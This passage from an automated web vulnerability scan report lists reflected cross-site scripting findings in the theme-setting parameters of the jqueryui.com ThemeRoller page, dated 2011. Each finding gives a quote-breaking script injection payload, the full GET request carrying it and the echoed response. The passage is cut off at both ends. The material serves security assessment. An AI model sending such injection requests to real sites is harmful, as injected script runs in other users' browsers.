95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pngda742"><script>alert(1)</script>727d2ffc486&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

4.150. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c1d1"><script>alert(1)</script>4ed3b8831ca was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png5c1d1"><script>alert(1)</script>4ed3b8831ca&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png5c1d1"><script>alert(1)</script>4ed3b8831ca&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefaul
...[SNIP]...

4.151. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a787"><script>alert(1)</script>ae185997c75 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png4a787"><script>alert(1)</script>ae185997c75&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png4a787"><script>alert(1)</script>ae185997c75&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&ic
...[SNIP]...

4.152. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa7d"><script>alert(1)</script>92ca4284c32 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png1fa7d"><script>alert(1)</script>92ca4284c32&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png1fa7d"><script>alert(1)</script>92ca4284c32&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcConte
...[SNIP]...

4.153. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5de"><script>alert(1)</script>f8b2441e340 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png5e5de"><script>alert(1)</script>f8b2441e340&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png5e5de"><script>alert(1)</script>f8b2441e340&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009
...[SNIP]...

4.154. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c1e"><script>alert(1)</script>128443e0cb7 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e252c1e"><script>alert(1)</script>128443e0cb7&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e252c1e"><script>alert(1)</script>128443e0cb7&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5
...[SNIP]...

4.155. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d45be"><script>alert(1)</script>aaa5c7de17d was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd45be"><script>alert(1)</script>aaa5c7de17d&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd45be"><script>alert(1)</script>aaa5c7de17d&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextur
...[SNIP]...

4.156. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 763a4"><script>alert(1)</script>a96feca88dd was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7763a4"><script>alert(1)</script>a96feca88dd&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
da%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7763a4"><script>alert(1)</script>a96feca88dd&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefaul
...[SNIP]...

4.157. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ee2"><script>alert(1)</script>a004327990c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e783ee2"><script>alert(1)</script>a004327990c&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e783ee2"><script>alert(1)</script>a004327990c&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

4.158. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe97e"><script>alert(1)</script>d413db24598 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxfe97e"><script>alert(1)</script>d413db24598&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0